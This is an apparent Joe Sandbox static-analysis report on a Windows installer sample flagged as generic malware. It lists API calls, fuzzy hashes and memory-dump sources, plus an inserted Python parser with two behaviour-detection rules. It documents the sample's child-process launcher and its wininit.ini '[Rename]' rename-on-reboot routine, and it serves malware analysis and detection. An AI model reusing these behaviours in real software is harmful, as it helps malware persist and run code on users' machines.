• Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
• Opcode ID: dc959893e0748e5b93c2d0ca3b5ec6abaee85400367ba77a9cf45422cd82545c
• Instruction ID: b48363985cd602751ae38a2791165fd5af0714f22da7c63f7ced5d0d9316473d
• Opcode Fuzzy Hash: dc959893e0748e5b93c2d0ca3b5ec6abaee85400367ba77a9cf45422cd82545c
• Instruction Fuzzy Hash: 6EF0A072608144AAD710EBA49A49AEEB7689F51324F60447BF142B20C1D6B849459B3A
Uniqueness
• Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                        • Instruction ID: c3f2784b42629965e79a9deb6a6c5a882cbc70a40949ec996fd179ba06f8b65e
                                                                        • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                        • Instruction Fuzzy Hash: EBE1BB71904719DFDB24CF58C880BAAB7F1FB45305F11852EE497A72C1E738AA91CB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                        • Instruction ID: 973a31ab38dbc5c4480f1d9ea431a22b3101bf508bc4e87126308f85d1407ce0
                                                                        • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                        • Instruction Fuzzy Hash: 03C13631E042199BCF18CF68D8905EEBBB2FF89314F25866AD85677380D734A942CB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404CF0
                                                                        • GetDlgItem.USER32(?,00000408), ref: 00404CFD
                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D4C
                                                                        • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404D63
                                                                        • SetWindowLongA.USER32(?,000000FC,004052EC), ref: 00404D7D
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D8F
                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DA3
                                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404DB9
                                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404DC5
                                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404DD5
                                                                        • DeleteObject.GDI32(00000110), ref: 00404DDA
                                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E05
                                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E11
                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EAB
                                                                        • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404EDB
                                                                          • Part of subcall function 00404309: SendMessageA.USER32(00000028,?,00000001,00404139), ref: 00404317
                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EEF
                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404F1D
                                                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F2B
                                                                        • ShowWindow.USER32(?,00000005), ref: 00404F3B
                                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00405036
                                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040509B
                                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 004050B0
                                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 004050D4
                                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 004050F4
                                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00405109
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00405119
                                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405192
                                                                        • SendMessageA.USER32(?,00001102,?,?), ref: 0040523B
                                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 0040524A
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00405275
                                                                        • ShowWindow.USER32(?,00000000), ref: 004052C3
                                                                        • GetDlgItem.USER32(?,000003FE), ref: 004052CE
                                                                        • ShowWindow.USER32(00000000), ref: 004052D5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                        • String ID: $M$N$Y,J
                                                                        • API String ID: 2564846305-2766381414
                                                                        • Opcode ID: ca7dbb6a503788cd47dbf5d08f4323d521cbc5f7f974eef513618351bc7c7494
                                                                        • Instruction ID: c814a1149ae8d70461ce7ac85806320f31a4e43cf09a070d2a5393f0519b6fc2
                                                                        • Opcode Fuzzy Hash: ca7dbb6a503788cd47dbf5d08f4323d521cbc5f7f974eef513618351bc7c7494
                                                                        • Instruction Fuzzy Hash: 1E026AB0A00209AFDB20DF64CD45AAE7BB5FB44354F54817AFA10BA2E0C7788D52DF59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004044CA
                                                                        • GetDlgItem.USER32(00000000,000003E8), ref: 004044DE
                                                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004044FC
                                                                        • GetSysColor.USER32(?), ref: 0040450D
                                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040451C
                                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040452B
                                                                        • lstrlenA.KERNEL32(?), ref: 0040452E
                                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040453D
                                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404552
                                                                        • GetDlgItem.USER32(?,0000040A), ref: 004045B4
                                                                        • SendMessageA.USER32(00000000), ref: 004045B7
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 004045E2
                                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404622
                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 00404631
                                                                        • SetCursor.USER32(00000000), ref: 0040463A
                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 00404650
                                                                        • SetCursor.USER32(00000000), ref: 00404653
                                                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040467F
                                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404693
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                        • String ID: D@$ExecToStack$N$Y,J
                                                                        • API String ID: 3103080414-3982796002
                                                                        • Opcode ID: 35ee71d5250129fbf2f36168019ba60c9b2f338ba1f9cfece2971a749f388ba2
                                                                        • Instruction ID: ec86402776fd01095bc4262357a67ddb6d4548b01b5252dde79e8ca7eec82ec2
                                                                        • Opcode Fuzzy Hash: 35ee71d5250129fbf2f36168019ba60c9b2f338ba1f9cfece2971a749f388ba2
                                                                        • Instruction Fuzzy Hash: 0761A2B1A00209BBDB10AF61DC45B6A3B68EB84754F10443AFB04BB1D1D7B9A9618F98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                        • DrawTextA.USER32(00000000,Drivelingly Setup,000000FF,00000010,00000820), ref: 00401156
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                        • String ID: Drivelingly Setup$F
                                                                        • API String ID: 941294808-2226598432
                                                                        • Opcode ID: 2271267dbcbb5a429a5c45712c2942ab76dd5bcbd32f73574c3dae7e133f94db
                                                                        • Instruction ID: 1fbfacec2506b2ab202253b0e42594ede9e170c8a1cf430301d1f688d6e441df
                                                                        • Opcode Fuzzy Hash: 2271267dbcbb5a429a5c45712c2942ab76dd5bcbd32f73574c3dae7e133f94db
                                                                        • Instruction Fuzzy Hash: AA417D71800209AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74E955DFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetCommandLineA.KERNEL32(00000400), ref: 6EAC19D4
                                                                        • lstrcpynA.KERNEL32(?,00000000), ref: 6EAC19E2
                                                                        • CharNextA.USER32(00000022), ref: 6EAC1A0F
                                                                        • CharNextA.USER32(00000022), ref: 6EAC1A18
                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 6EAC1A39
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6EAC1A4B
                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 6EAC1A58
                                                                        • CloseHandle.KERNEL32(?), ref: 6EAC1A67
                                                                        • CloseHandle.KERNEL32(?), ref: 6EAC1A6C
                                                                        • ExitProcess.KERNEL32 ref: 6EAC1A71
                                                                        • ExitProcess.KERNEL32 ref: 6EAC1A7C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1379662989.000000006EAC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EAC0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1379640466.000000006EAC0000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000000.00000002.1379684801.000000006EAC2000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000000.00000002.1379750126.000000006EAC3000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000000.00000002.1379781257.000000006EAC4000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6eac0000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Exit$CharCloseHandleNext$CodeCommandCreateLineObjectSingleWaitlstrcpyn
                                                                        • String ID: "$"$D
                                                                        • API String ID: 3771911414-3923985841
                                                                        • Opcode ID: 62f31717705739ca07c70a6a5bb18a4ef16f804e6e2bb29ecdec9fe8b86bb9d6
                                                                        • Instruction ID: 17b764f1f35a95c28e9ee24561daafd4909a17cfaf236233415f52d3ef9a58fe
                                                                        • Opcode Fuzzy Hash: 62f31717705739ca07c70a6a5bb18a4ef16f804e6e2bb29ecdec9fe8b86bb9d6
                                                                        • Instruction Fuzzy Hash: 182160B1904A4CBFEF119BE4CC58AEEBFB9AB06700F409062E241B7051C6705D8ACBB5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%
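Added example, not part of the Joe Sandbox report: a small parser for the "APIs" lines of a function entry, with two behavioural rules run over the result. It serves the entry above (the spawn-and-wait wrapper at 6EAC19D4 in the plug-in DLL mapped at 6EAC0000) and the `[Rename]` entry that follows it (00405EF1 in the main image). The sample inputs are copied verbatim from those two listings on this page; the rule names, the `Call` type and the reading of the second function as a hand-written wininit.ini `[Rename]` append are this example's own assumptions, not Joe Sandbox signatures or verdicts.

```python
"""Added example, not part of the Joe Sandbox report: parse the report's
'APIs' lines into a call sequence and run two behavioural rules over it.
Sample lines are copied from this page (function 6EAC19D4 in the plug-in
DLL, function 00405EF1 in the main image); the rule labels are this
example's own, not Joe Sandbox signature names."""
import re
from dataclasses import dataclass
from typing import Optional

# One API line: "• Api.MODULE(arg,...), ref: ADDR" or "• Api.MODULE ref: ADDR".
# A "Part of subcall function X:" prefix marks a call made inside callee X.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

LAUNCHER = """
• GetCommandLineA.KERNEL32(00000400), ref: 6EAC19D4
• lstrcpynA.KERNEL32(?,00000000), ref: 6EAC19E2
• CharNextA.USER32(00000022), ref: 6EAC1A0F
• CharNextA.USER32(00000022), ref: 6EAC1A18
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 6EAC1A39
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 6EAC1A4B
• GetExitCodeProcess.KERNEL32(?,?), ref: 6EAC1A58
• CloseHandle.KERNEL32(?), ref: 6EAC1A67
• CloseHandle.KERNEL32(?), ref: 6EAC1A6C
• ExitProcess.KERNEL32 ref: 6EAC1A71
• ExitProcess.KERNEL32 ref: 6EAC1A7C
"""

RENAME = """
• CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406051,?,?), ref: 00405EF1
• GetShortPathNameA.KERNEL32(?,0042C620,00000400), ref: 00405EFA
  • Part of subcall function 00405D4F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
  • Part of subcall function 00405D4F: lstrlenA.KERNEL32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D91
• GetShortPathNameA.KERNEL32(?,0042CA20,00000400), ref: 00405F17
• wsprintfA.USER32 ref: 00405F35
• GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405F70
• GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F7F
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB7
• SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 0040600D
• GlobalFree.KERNEL32(00000000), ref: 0040601E
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406025
"""


@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: tuple                    # argument strings as printed ("?" = unresolved)
    ref: int                       # address of the call site
    subcall: Optional[str] = None  # callee whose body made the call, if any


def parse_api_listing(text: str) -> list:
    """Return the calls of one function entry, in listing (address) order."""
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:                  # "APIs", "Strings" and other headings
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16), m["sub"]))
    return calls


def in_order(calls, *steps) -> bool:
    """True if each step (a tuple of acceptable API names) is hit in order
    by the function's own calls; unrelated calls may sit in between."""
    names = iter(c.api for c in calls if c.subcall is None)
    return all(any(name in step for name in names) for step in steps)


def spawn_and_wait(calls) -> bool:
    """Launcher shape: create a child, block on it, read back its exit code,
    then exit. In LAUNCHER the CreateProcessA args show bInheritHandles=1
    (index 4) and a STARTUPINFOA cb of 0x44 (index 8)."""
    return in_order(calls, ("CreateProcessA", "CreateProcessW"),
                    ("WaitForSingleObject",), ("GetExitCodeProcess",),
                    ("ExitProcess",))


def writes_rename_section(calls) -> bool:
    """Shape of appending to an INI '[Rename]' section by hand (short paths,
    size the file, seek, write): a rename-on-reboot through wininit.ini
    rather than MoveFileEx(MOVEFILE_DELAY_UNTIL_REBOOT). Assumed reading."""
    literal = any(c.api == "lstrcpyA" and "[Rename]" in c.args for c in calls)
    return literal and in_order(calls, ("GetShortPathNameA",),
                                ("GetFileSize",), ("SetFilePointer",))
```

Two caveats when reading the matches. Arguments printed as `?` were not resolved statically, so a hit on the call shape says nothing about which binary is spawned or which file is renamed; that comes from the dynamic sections of the report. And the `000000FF` timeout on WaitForSingleObject is most likely a `push -1` (INFINITE) encoded as a sign-extended 8-bit immediate and printed unextended, not a 255 ms wait; confirm in the disassembly before treating it as a short timeout.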

                                                                        APIs
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406051,?,?), ref: 00405EF1
                                                                        • GetShortPathNameA.KERNEL32(?,0042C620,00000400), ref: 00405EFA
                                                                          • Part of subcall function 00405D4F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
                                                                          • Part of subcall function 00405D4F: lstrlenA.KERNEL32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D91
                                                                        • GetShortPathNameA.KERNEL32(?,0042CA20,00000400), ref: 00405F17
                                                                        • wsprintfA.USER32 ref: 00405F35
                                                                        • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405F70
                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F7F
                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB7
                                                                        • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 0040600D
                                                                        • GlobalFree.KERNEL32(00000000), ref: 0040601E
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406025
                                                                          • Part of subcall function 00405DEA: GetFileAttributesA.KERNELBASE(00000003,00402F4C,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe,80000000,00000003,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405DEE
                                                                          • Part of subcall function 00405DEA: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405E10
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                        • String ID: %s=%s$[Rename]
                                                                        • API String ID: 2171350718-1727408572
                                                                        • Opcode ID: a6f8535865e152dd70a19ec5118f58b7e289ee706de500976c435fcd53071054
                                                                        • Instruction ID: 8908439cc2d3cfcd996604707d180e10d826c6d0da91f503aeabb4e5616cbf2a
                                                                        • Opcode Fuzzy Hash: a6f8535865e152dd70a19ec5118f58b7e289ee706de500976c435fcd53071054
                                                                        • Instruction Fuzzy Hash: 1531E731640B16ABC2207B65AD48F5B3A9CDF45758F14043BFA42F62D2DB7CD8118AAD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CharNextA.USER32(0000000B,*?|<>/":,00000000,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 0040658D
                                                                        • CharNextA.USER32(0000000B,0000000B,0000000B,00000000,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 0040659A
                                                                        • CharNextA.USER32(0000000B,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 0040659F
                                                                        • CharPrevA.USER32(0000000B,0000000B,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 004065AF
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00406536
                                                                        • *?|<>/":, xrefs: 0040657D
                                                                        • "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe", xrefs: 00406535
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
